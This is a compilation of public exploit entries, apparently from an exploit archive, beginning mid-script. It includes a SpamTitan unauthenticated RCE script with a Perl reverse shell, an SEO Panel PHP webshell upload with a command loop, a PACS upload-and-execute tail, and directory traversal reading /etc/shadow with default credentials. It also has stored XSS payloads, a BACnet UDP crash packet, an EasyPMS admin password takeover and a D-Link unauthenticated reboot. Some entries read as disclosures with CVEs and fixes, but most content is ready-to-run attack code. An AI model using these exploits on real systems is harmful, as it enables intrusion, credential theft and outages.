login_data = { 'loginvalue': 'login', 'aetitle': dbname, 'username': uname, 'password': pword, 'formAntispam': antispam, 'login': 'Login', } r = session.post(URL2, data = login_data) files = [ ('actionvalue', (None, 'Attach', None)), ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')), ('action', (None, 'Attach', None)), ] r = session.post(URL3, files=files) today = datetime.today() upload_date = today.strftime("%Y%m%d") less = 1 now1 = datetime.now() up_time1 = now1.strftime("%H%M%S") print(up_time1) #varying time checks +/- now2 = now1 - timedelta(seconds=less) up_time2 = now2.strftime("%H%M%S") now3 = now2 - timedelta(seconds=less) up_time3 = now3.strftime("%H%M%S") now4 = now3 - timedelta(seconds=less) up_time4 = now4.strftime("%H%M%S") now5 = now4 - timedelta(seconds=less) up_time5 = now5.strftime("%H%M%S") now6 = now5 - timedelta(seconds=less) up_time6 = now6.strftime("%H%M%S") now7 = now6 - timedelta(seconds=less) up_time7 = now7.strftime("%H%M%S") now8 = now1 + timedelta(seconds=less) up_time8 = now8.strftime("%H%M%S") now9 = now8 + timedelta(seconds=less) up_time9 = now8.strftime("%H%M%S") now10 = now1 + timedelta(seconds=less) up_time10 = now9.strftime("%H%M%S") up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10] for i in up_time_array: r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd) if r.status_code == 200: print r.content print r.url else: print ("404") if __name__ == '__main__': main()

# Exploit Title: Karel IP Phone IP1211 Web Management Panel - Directory Traversal # Exploit Author: Berat Gokberk ISLER # Date: 2020-09-01 # CVE: N/A # Type: Webapps # Vendor Homepage: https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon # Version: IP1211 Details Directory traversal vulnerability on the Karel IP1211 IP Phone Web Panel. Remote authenticated users (Attackers used default credentials in this case) to perform directory traversal, provides access to sensitive data under indexes using the "cgiServer.exx?page=" parameter. In this case sensitive files, "passwd" and "shadow" files. # Vulnerable Parameter Type: GET # Payload: ../../../../../../../../etc/passwd or /etc/shadow # First Request: GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1 Host: X.X.X.X User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= # Basic Auth --> admin:admin Connection: close Upgrade-Insecure-Requests: 1 # First Response HTTP/1.0 200 OK Content-Type:text/html;charset=UTF-8 Expires:-1 Accept-Ranges:bytes Server:SIPPhone root:x:0:0:Root,,,:/:/bin/sh admin:x:500:500:Admin,,,:/:/bin/sh guest:x:501:501:Guest,,,:/:/bin/sh # Second Request GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/shadow HTTP/1.1 Host: X.X.X.X User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= # Basic Auth --> admin:admin Connection: close Upgrade-Insecure-Requests: 1 # Second Response HTTP/1.0 200 OK Content-Type:text/html;charset=UTF-8 Expires:-1 Accept-Ranges:bytes Server:SIPPhone root:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx:11876:0:99999:7::: admin:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx:11876:0:99999:7::: guest:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx:11876:0:99999:7:::

# Exploit Title: SpamTitan 7.07 - Unauthenticated Remote Code Execution # Date: 2020-09-18 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ # Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway # Version: 7.07 # Tested on: FreeBSD # CVE : CVE-2020-11698 ---[SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in snmp-x.php]------------------------------ SECURITY ADVISORY: SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in snmp-x.php Affected Software: SpamTitan Gateway 7.07 (possibly earlier versions) Vulnerability: Unauthenticated Remote Code Execution CVSSv3: 10.0 (https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) Severity: Critical Release Date: 2020-04-17 CVE: CVE-2020-11698 I. Background ~~~~~~~~~~~~~ From www.spamtitan.com: "SpamTitan Gateway is a powerful Anti-Spam appliance that equips network administrators with extensive tools to control mail flow and protect against unwanted email and malware." II. Description ~~~~~~~~~~~~~~~ Improper input sanitization of the parameter "community" on the page snmp-x.php would allow a remote attacker to inject command directives into the file snmpd.conf. This would allow executing commands on the target server by by injecting an "extend" or "exec" SNMPD directive and querying the snmp daemon of the server for the correct OID. III. PoC ~~~~~~~~ Use python 3 and install the following modules: requests, pysnmp. If your IP is 192.168.1.5 and the target SpamTitan server is spamtitan.example.com, call the PoC like this: ./poc.py -t spamtitan.example.com -i 192.168.1.5 --------------------------------------------- #!/usr/bin/env python # Author: Felipe Molina (@felmoltor) # Date: 09/04/2020 # Python Version: 3.7 # Summary: This is PoC for an unauthenticated RCE 0day on SpamTitan 7.07 and previous versions. # The script abuses of two weaknesses on the product: # 1. Unauthenticated interaction with snmp-x.php script # 2. Injection of snmpd.conf configuration directives in multiple POST parameters such as "community" or "user_username" of snmp-x.php # Product URL: https://www.spamtitan.com/ # Product Version: 7.07 and probably previous import requests requests.packages.urllib3.disable_warnings() import os import threading from optparse import OptionParser import socket import json from pysnmp.hlapi import * from urllib.parse import urlparse from time import sleep SNMPGETDELAY=5 def parseoptions(): parser = OptionParser() parser.add_option("-t", "--target", dest="target", help="Target SpamTitan URL to attack. E.g.: https://spamtitan.com/", default=None) parser.add_option("-i", "--ip", dest="ip", help="Local IP where to listen for the reverse shell. Default: %s" % myip(), default=myip()) parser.add_option("-p", "--port", dest="port", help="Local Port where to listen for the reverse shell. Default: 4242", default=4242) parser.add_option("-q", "--quiet", action="store_true", dest="quiet", default=False, help="Shut up script! Just give me the shell.") return parser.parse_args() def printmsg(msg,quiet=False,msgtype="i"): if (not quiet): if (success): print("[%s] %s" % (msgtype,msg)) else: print("[-] %s" % msg) def info(msg,quiet=False): printmsg(msg,quiet,msgtype="i") def success(msg,quiet=False): printmsg(msg,quiet,msgtype="+") def fail(msg,quiet=False): printmsg(msg,quiet,msgtype="-") def myip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # doesn't even have to be reachable s.connect(('10.255.255.255', 1)) IP = s.getsockname()[0] except: IP = '127.0.0.1' finally: s.close() return IP def shellServer(ip,port,quiet): servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM) servers.bind((ip, port)) servers.listen(1) info("Waiting for incoming connection on %s:%s" % (ip,port)) conn, addr = servers.accept() conn.settimeout(1) success("Hurray, we got a connection from %s" % addr[0]) prompt =conn.recv(128) prompt=str(prompt.decode("utf-8")).strip() command = input(prompt) while True: try: c = "%s\n" % (command) if (len(c)>0): conn.sendall(c.encode("utf-8")) # Quit the console if command == 'exit': info("\nClosing connection") conn.close() break else: completeanswer="" while True: answer=None try: answer=str((conn.recv(1024)).decode("utf-8")) completeanswer+=answer except socket.timeout: completeanswer.strip() break print(completeanswer,end='') command = input("") except (KeyboardInterrupt, EOFError): info("\nClosing connection") break def triggerSNMPShell(target, community, triggeroid, port, quiet): if (not quiet): print("Waiting %s seconds to allow the main thread set-up the shell listener." % SNMPGETDELAY) # Give the parent thread a few seconds to set up the shell listener before triggering the SNMP get query sleep(SNMPGETDELAY) if (not quiet): print("Querying the SNMP server to launch the shell.") targetp = urlparse(target) errorIndication, errorStatus, errorIndex, varBinds = next( getCmd(SnmpEngine(), CommunityData(community, mpModel=0), UdpTransportTarget((targetp.netloc, port)), ContextData(), ObjectType(ObjectIdentity(triggeroid))) ) if errorIndication: print("SNMP error: %s" % errorIndication) elif errorStatus: print('SNMP error status: %s at %s' % (errorStatus.prettyPrint(), errorIndex and varBinds[int(errorIndex) - 1][0] or '?')) def main(): (options,arguments) = parseoptions() q = options.quiet t = options.target i = options.ip p = options.port community="dummy" if (t is None): print("[-] Error. Specify a target (-t).") exit() if ((not "http://" in t) and (not "https://" in t)): t = "http://%s/snmp-x.php" % t else: t = "%s/snmp-x.php" % t if (not q): print("[+] Attacking: %s.\nReceiving shell in %s:%s" % (t,i,p)) TARGETOID=".1.3.6.1.4.1.8072.1.3.2.3.1.1.8.114.101.118.115.104.101.108.108" # PAYLOAD="extend revshell /usr/bin/perl -e 'use Socket;$i=\"%s\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" % (i,p) PAYLOAD="extend revshell /usr/bin/perl -e 'use Socket;$i=\"%s\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" % (i,p) TOGGLESNMP={ "jaction":"toggleSNMP", "newval":"1" } INJECTION={ "jaction":"saveAll", "contact":"CONTACT", "name":"SpamTitan", "location":"LOCATION", # Add our IP as allowed to query the injected "dummy" community # Add also the perl payload in a new line (%0a) of the snmpd.conf file "community":'%s" %s\n%s # ' % (community,i,PAYLOAD) } rev_thread = threading.Thread(target=triggerSNMPShell, args=(t, community, TARGETOID, 161,q)) rev_thread.start() # Start a thread to listen for incoming reverse shells: if (not q): print("[+] Launching a reverse shell listener to wait for the shell.") # Send the SNMP request to add a community and append an "extend" command to execute scripts # SpamTitan would add a new line in the snmpd.conf file with the new community name and the "extend" script inj_res = requests.post(t,INJECTION,verify=False) if (inj_res.status_code == 200): if (not q): print("Spawning a reverse shell listener. Wait for it...") shellServer(options.ip,int(options.port),options.quiet) else: print("Error. The target is probably not vulnerable (returned a %s code)." % inj_res.status_code) main() --------------------------------------------- III. Impact ~~~~~~~~~~~ The snmpd daemon is running as root in the target server. The pressented PoC would return a root shell without need of any registered user in the target server. There is total loss of confidentiality, integrity and availability on the SpamTitan server. IV. Disclosure ~~~~~~~~~~~~~~ Reported By: Felipe Molina de la Torre Vendor Informed: 2020-04-17 Patch Release Date: 2020-05-26 Advisory Release Date: 2019-09-18 V. References ~~~~~~~~~~~~~ * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698 * https://sensepost.com/blog/2020/clash-of-the-spamtitan/ ---------------------------------[SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in snmp-x.php]---

# Exploit Title: Photo Share Website 1.0 - Persistent Cross-Site Scripting # Date: 2020-09-30 # Exploit Author: Augkim # Vendor Homepage: https://www.sourcecodester.com/php/14478/photo-share-website-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/photo-share-website-using-php.zip # Tested on: Linux Apache2 POST /soci/ajax.php?action=save_comment HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 45 DNT: 1 Connection: close Referer: http://localhost/soci/index.php?page=home Cookie: mode=day; src=1; BEEFHOOK=0hqrkHLyTmW38TaPrDHRUW4LsDpXKDSSqAQf54dt0hIA0wFNpjkoJYFlnGhoKw2T4qQHIUZ5oESFGSVW; PHPSESSID=cq8j6ug2vem0obmno6fi0h9404; access=1 Origin: foo.example.org PoC: post_id=4&comment="><script>alert(2)</script>

# Title: BACnet Test Server 1.01 - Remote Denial of Service (PoC) # Date: 2020-10-07 # Author: LiquidWorm # Vendor: https://www.bac-test.com # Product link: https://sourceforge.com/projects/bacnetserver # CVE: N/A #!/usr/bin/perl # # BACnet Test Server 1.01 Remote Denial of Service Exploit # # # Vendor: BACnet Interoperability Test Services, Inc. # Product web page: https://www.bac-test.com # https://sourceforge.com/projects/bacnetserver # Affected version: 1.01 (BACnet Stack Version 0.5.7) # # Summary: This is a simple BACnet Server aimed at developers who # want to explore or test their BACnet Client implementations of # the ASHRAE BACnet protocol. It is based on Steve Karg's fine # implementation of the BACnet Stack. # # Desc: The BACNet Test Server is vulnerable to a denial of service # (DoS) vulnerability when sending malformed BVLC Length UDP packet # to port 47808 causing the application to crash. # # Type - 0x81 # BVLC Function # - 0x01 - Write Broadcast Distribution Table # - 0x02 - Read Broadcast Distribution Table # - 0x03 - Read Broadcast Distribution Table ACK # - 0x04 - Forwarded NPDU with optional Originating Device IP address and Port included in BVLL header # - 0x05 - Register Foreign Device with expiration timeout (Time-to-live) in seconds # - 0x0a - Original-Unicast-NPDU used to send directed NPDUs to another BACnet/IP device or router. # Optional Originating Device IP address and Port NOT included in BVLL header. # - 0x0b - Original-Broadcast-NPDU used by devices (except foreign devices) to broadcast messages on B/IP networks. # - 0x0c - Secure-BVLL # - BVLL Length # - IP address of Originating Device - optional depending on BVLC Function Code # - Port number of Originating Device - optional depending on BVLC Function Code # - NPDU - Network Layer Protocol Data Unit # # ================================================================= # (67c.2f34): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # *** WARNING: Unable to verify checksum for C:\Program Files (x86)\BACnet Interoperability Testing Services, Inc\BACnet Server\Server.exe # eax=00600000 ebx=00692000 ecx=009bd796 edx=005fee00 esi=005fec04 edi=005fed00 # eip=00994313 esp=005fec04 ebp=005fed00 iopl=0 nv up ei pl nz ac pe nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 # Server+0x34313: # 00994313 8810 mov byte ptr [eax],dl ds:002b:00600000=?? # 0:000> d 994313 +77 # 0099438a cccccccc # 0099438e cccccccc # 00994392 cccccccc # 00994396 cccccccc # 0099439a cccccccc # 0:000> d esp # 005fec04 005ff3f8 # 005fec08 005ff408 # 005fec0c 00692000 # 005fec10 cccccccc # 005fec14 cccccccc # 004fec18 cccccccc # ================================================================= # # Tested on: Microsoft Windows 10 Professional (EN) # Microsoft Windows 7 Professional SP1 (EN) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5597 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php # # # 05.08.2019 # use strict; use warnings; use IO::Socket::INET; my $target = "10.0.99.34"; my $porta = 47808; my $proto = "udp"; my $stype = SOCK_DGRAM; my $timeout = 1; my $socket = new IO::Socket::INET ( PeerHost => $target, PeerPort => $porta, Proto => $proto, Type => $stype, Timeout => $timeout ) or die "Socket error. : $!\n"; print "Connected to: $target:$porta\n"; $| = 1; binmode $socket; my $data = "\x81\x09\xFF\xFE"; print "Sending: $data [ ".length($data)." bytes ]\n"; send ($socket, $data, 0) or die "Nope: $!\n"; print "Done.\n"; $socket->close();

# Exploit Title: EasyPMS 1.0.0 - Authentication Bypass # Discovery by: Jok3r # Vendor Homepage: https://www.elektraweb.com/en/ # Software Link: https://github.com/Travelaps/EasyPMS/releases/ # Tested Version: 1.0.0 # Vulnerability Type: Authentication Bypass # Tested on OS: Windows Server 2012 #Description: EasyPMS has authentication bypass vulnerability that low privilege user can escalate privilege to HotelOwner admin privilege. Steps to Reproduce: 1) Unprivileged user can manipulate sql query within json request format. Admin user code can be obtained using single quote after ID column so that where clause is invalid. First Request: POST /Select/STDUSER HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://target/app/record/user-profile;index=$ANG.STDUSERID Content-Type: text/plain Content-Length: 689 Origin: https://target Connection: close {"Action":"Select","Object":"STDUSER","Select":["ID","USERCODE","PASSWORD","EMAIL","LASTNAME","GSM","PHONE","HOTELID","FIRSTNAME","PINCODE"],"Where":[{"Column":"ID'","Operator":"=","Value":"80403"},{"Column":"HOTELID","Operator":"=","Value":22330}],"Paging":{"Current":1,"ItemsPerPage":3},"LoginToken":"token_value"} 2) While user is sending password resetting request, can change password of Admin user that is inside HotelOwner privilege class. Because there is not validation of token and user has write permission on STDUSER table so admin user password can be changed by unprivileged user that obtains ID of admin user sending first request. Second Request: POST / HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://target/login Content-Type: text/plain Content-Length: 128 Origin: https://target Connection: close {"Row":{"PASSWORD":"Qw12344.","ID":"80401","HOTELID":22330},"SelectAfterUpdate":["ID"],"Action":"Update","Object":"STDUSER"} # Timeline: # 01.10.2020 - issue was discovered # 02.10.2020 - notify to vendor # 02.10.2020 - vendor fixed

# Exploit Title: Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting # Exploit Author: Alperen Ergel # Web Site: https://alperenae.gitbook.io/ # Software Homepage: https://textpattern.com/ # Version : 4.6.2 # Tested on: windows 10 / xammp # Category: WebApp # Google Dork: intext:"Published with Textpattern CMS" # Date: 2020-10-29 # CVE :- ######## Description ######## # # 1-) Loggin administrator page # # 2-) Write new blog add payload to 'body' # # 3-) Back to web site then will be work payload # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /textpattern/textpattern/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost/textpattern/textpattern/index.php?event=article&ID=3 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------127132438115577379281797109093 Content-Length: 6080 Connection: close Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40; __atuvs=5f77129c504c17ce000 ### SNIPPP HERE #### -----------------------------127132438115577379281797109093 Content-Disposition: form-data; name="Title" XSS -----------------------------127132438115577379281797109093 Content-Disposition: form-data; name="textile_body" 1 -----------------------------127132438115577379281797109093 Content-Disposition: form-data; name="Body" <script>alert(1)</script> -----------------------------127132438115577379281797109093

# Exploit Title: D-Link DSR-250N 3.12 - Denial of Service (PoC) # Google Dork: N/A # Author: RedTeam Pentesting GmbH # Date: 2020-10-03 # Exploit Author: Kiko Andreu (kikoas1995) & Daniel Monzón (stark0de) # Vendor Homepage: https://www.dlink.com # Software Link: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router # Version: 3.17B # CVE : CVE-2020-26567 Advisory: Denial of Service in D-Link DSR-250N RedTeam Pentesting discovered a Denial-of-Service vulnerability in the D-Link DSR-250N device which allows unauthenticated attackers in the same local network to execute a CGI script which reboots the device. Details ======= Product: D-Link DSR-250N Affected Versions: 3.12 and potentially later Fixed Versions: 3.17B Vulnerability Type: DoS Security Risk: low Vendor URL: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002 Advisory Status: published CVE: CVE-2020-26567 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567 Introduction ============ "The D-Link Wireless N Unified Service Router (DSR-250N) provides enhanced security, functionality and performance over a traditional VPN router without the complexity of a full firewall solution. The D-Link Wireless N Unified Service Router is a cost-effective, high performance solution for securing a small business network." (from the vendor's homepage) More Details ============ During a penetration test, the firmware for the D-Link DSR-250N router was downloaded from D-Links official website[1] and extracted for further analysis. It was then confirmed that CGI scripts exist on the router that can be directly accessed with a web browser, without any authentication. In particular, the script "upgradeStatusReboot.cgi" executes the command to reboot the device. Its contents are: ------------------------------------------------------------------------ #!/bin/sh echo Content-type: text/plain echo "" stat=`/sbin/reboot -d 8 &` echo $stat ------------------------------------------------------------------------ Executing this script renders the device unusable for the time of the reboot. In tests, it turned out that the device needs roughly four minutes to complete a reboot. As a consequence, any network using the device as a switch or router is not accessible during that time, too. In the penetration test, the router's web interface was available directly over the Internet. According to the vendor, the web interface is by default disabled for the WAN interface. Proof of Concept ================ An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will reboot the device: ------------------------------------------------------------------------ $ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi ------------------------------------------------------------------------ Workaround ========== Access to the D-Link DSR-250N's web interface should only be enabled for administrators, for example by only allowing access from specific IP addresses in the firewall. Access over the WAN interface should also be disabled if it was enabled manually. Fix === A preview firmware version named 3.17B which should correct the issue was received at the end of September from the vendor. RedTeam Pentesting was not able to verify the fix due to lack of access to a test device. However, the formerly accessible CGI script is no longer part of the firmware. Security Risk ============= No authentication is needed to excute the CGI script and thereby reboot the device. Attackers might abuse this behaviour for targeted denial-of-service-attacks against D-Link customers, since rebooting the device interrupts access to networks relying on this device for routing or switching purposes. However, the attack is only possible if the attacker resides on the same network, and no further information can be gathered or control over the devices be obtained. Therefore, the vulnerability is rated as a low risk. Timeline ======== 2020-06-29 Vulnerability identified 2020-07-03 Customer approved disclosure to vendor 2020-07-03 Requested security contact from vendor via web formular 2020-07-03 Vendor replied with contact information 2020-07-07 Advisory provided to vendor 2020-09-28 Vendor provided fixed version to RedTeam Pentesting 2020-10-05 CVE ID requested 2020-10-06 CVE ID assigned 2020-10-08 Advisory released References ========== [1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:

# Exploit Title: Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting # Exploit Author: Ataberk YAVUZER # CVE: CVE-2019-19493 # Type: Webapps # Vendor Homepage: https://www.kentico.com/ # Version: 9.0-12.0.49 # Date: 29-11-2019 #CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2019-19493 Details Persistent Cross Site Scripting vulnerability has been found on the Admin/User Panel. Kentico before 12.0.50 allows file uploads in which the Content-Type header is inconsistent with the file extension, leading to XSS. # Steps to reproduce 1. Log in to Kentico Admin Panel with your credentials. 2. Browse to Profile Page. 3. Click to "Browse" button on Avatar section. 4. Select "avatar.svg" file which can be found on below. 5. Intercept the request before clicking to save button. 6. Change file name to "avatar.svg.png" and send the request. (MimeType needs to be "image/xml+svg") 7. Kentico will generate an avatar link: " http://example.kentico.com/admin/CMSPages/GetAvatar.aspx?avatarguid=<generated_avatar_uid>" Send that link to another user. 8. An alert with cookie values will pop up. #Content of the avatar.svg: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>

# Exploit Title: SEO Panel 4.6.0 - Remote Code Execution # Google Dork: N/A # Date: 2020-10-03 # Exploit Author: Kiko Andreu (kikoas1995) & Daniel Monzón (stark0de) # Vendor Homepage: https://seopanel.org/ # Software Link: https://www.seopanel.org/spdownload/4.6.0 # Version: 4.6.0 # Tested on: Kali Linux x64 5.4.0 # CVE : N/A #!/usr/bin/python import sys import os import requests ip = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] port = sys.argv[4] proto = sys.argv[5] if (len(sys.argv) < 6): print "Usage: python " + sys.argv[0] + " <ip> + <webapp user> + <webapp pwd> + <webapp port> + <http/https>" exit() session = requests.session() # Get to login page burp0_url = proto + "://" + ip + ":" + port + "//login.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"} session.get(burp0_url, headers=burp0_headers, verify=False) # Login with the provided credentials burp0_url = proto + "://" + ip + ":" + port + "//login.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": proto + "://" + ip + "//login.php", "Content-Type": "application/x-www-form-urlencoded", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"} burp0_data = {"sec": "login", "red_referer": proto + "://" + ip + "/", "userName": user, "password": pwd, "login": ''} session.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False) # Upload the webshell burp0_url = proto + "://" + ip + ":" + port + "//websites.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": proto + "://" + ip + "//admin-panel.php", "Content-Type": "multipart/form-data; boundary=---------------------------193626971803013289998688514", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"} burp0_data = "-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"sec\"\r\n\r\nimport\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"userid\"\r\n\r\n1\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"website_csv_file\"; filename=\"shell.php\"\r\nContent-Type: text/csv\r\n\r\n<?php system($_GET['c']); ?>\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"delimiter\"\r\n\r\n,\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"enclosure\"\r\n\r\n\"\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"escape\"\r\n\r\n\\\r\n-----------------------------193626971803013289998688514--\r\n" session.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False) exit = 0 first = 1 # Loop for remote code execution while (exit == 0): cmd = raw_input("> ") burp0_url = proto + "://" + ip + ":" + port + "//tmp/shell.php?c=" + cmd burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"} x = session.get(burp0_url, headers=burp0_headers, verify=False) if (x.status_code == 200 and first == 1): first = 0 print "[+] Shell uploaded successfully!" print x.text if (cmd == "exit"): exit = 1

# Exploit Title: DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated) # Date: 2020-10-09 # Exploit Author: Enes Özeser # Vendor Homepage: https://dynpg.org/ # Version: 4.9.1 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Login to admin panel. 2- Click on the "Texts" button. 3- Write XSS payload into the Groupname. 4- Press "Create" button. XSS Payload ==> <script>alert("XSS");</script> ==> HTTP Request <== POST /index.php?show=4 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------342819783638885794661955465553 Content-Length: 725 Origin: http://(HOST) Connection: close Referer: http://(HOST)/index.php?show=4 Cookie: PHPSESSID=bsbas234jfvvdasdasd1i Upgrade-Insecure-Requests: 1 -----------------------------342819783638885794661955465553 Content-Disposition: form-data; name="NEW_GROUP_NAME" <script>alert("XSS");</script> -----------------------------342819783638885794661955465553 Content-Disposition: form-data; name="GROUP_ID" 0 -----------------------------342819783638885794661955465553 Content-Disposition: form-data; name="GRP_SUBMIT" Create -----------------------------342819783638885794661955465553 Content-Disposition: form-data; name="GRP_ACTION" new_grp -----------------------------342819783638885794661955465553 Content-Disposition: form-data; name="dpg_csrf_token" 3F16478C29BED20AA73F1D25CB23F471 -----------------------------342819783638885794661955465553--

